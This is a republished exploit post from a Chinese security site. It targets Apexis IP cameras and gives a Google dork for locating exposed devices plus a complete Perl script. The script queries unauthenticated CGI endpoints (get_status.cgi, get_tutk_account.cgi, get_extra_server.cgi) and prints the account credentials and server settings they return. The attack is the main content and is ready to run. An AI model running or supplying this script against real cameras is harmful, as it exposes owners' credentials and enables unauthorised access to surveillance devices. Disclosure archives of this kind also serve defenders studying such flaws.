首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apexis IP CAM Username / Password Disclosure
来源:www.remoteexecution.net 作者:Godoy 发布时间:2015-06-10  
http://pastebin.com/AJ9eQvXc


# Exploit Title: Apexis IP CAM - Full Info Disclosure
# Google Dork: inurl:"get_status.cgi"cgi-bin/
# Date: 01/06/2015
# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE
Remoteexecution.net
# Vendor Homepage: http://www.apexis.com.cn/
# Tested on: Linux

[Exploit Code]

#!/usr/bin/perl
print "[ Apexis IP CAM - Full Info Disclosure ]\n";
print "[ Discovery by: Sunplace Solutions ]\n";
print "[ Exploit:  Sunplace Solutions ]\n";
print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
print "URL: ";
$url=<STDIN>;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;

$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');

chop($url);
if ($url eq "")
  {
    print 'URL dont empty!.'."\n";
  }
  else
  {
   $www = new LWP::UserAgent;
   @path=split(/cgi-bin/,$url);
   $content = $www->get($url) or error();
    print "\n[x]Trying to pwn =>".$path[1]."\n";
    print "Result: \n";

   $pwn = $content->content;
   $pwn=~ s/var//g;
   $pwn=~ s/ //g;
   $pwn=~ s/ret_//g;
   print $pwn;

    print "\n[x]Trying to pwn => /get_tutk_account\n";
    print "Result: \n";
   $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or error();
   $pwn = $content->content;
   $pwn=~ s/var//g;
   $pwn=~ s/ret_//g;
   $pwn=~ s/ //g;

   print $pwn;

    print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
    print "Result: \n";
   $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or error();
   $pwn = $content->content;
   $pwn=~ s/var//g;
   $pwn=~ s/ret_//g;
   $pwn=~ s/extra_//g;
   $pwn=~ s/ //g;
   print $pwn;
  }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer 11
·ProFTPD 1.3.5 Mod_Copy Command
·Viber Remote Crash Proof Of Co
·GeoVision (GeoHttpServer) Webc
·Microsoft Windows HTA Crash Pr
·Libmimedir VCF Memory Corrupti
·Beckhoff IPC Diagnositcs Authe
·This POODLE Bites: Exploiting
·1 Click Extract Audio 2.3.6 -
·OSSEC 2.8.1 Local Root Escalat
·1 Click Audio Converter 2.3.6
·D-Link DSP-W110 Command Execut
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved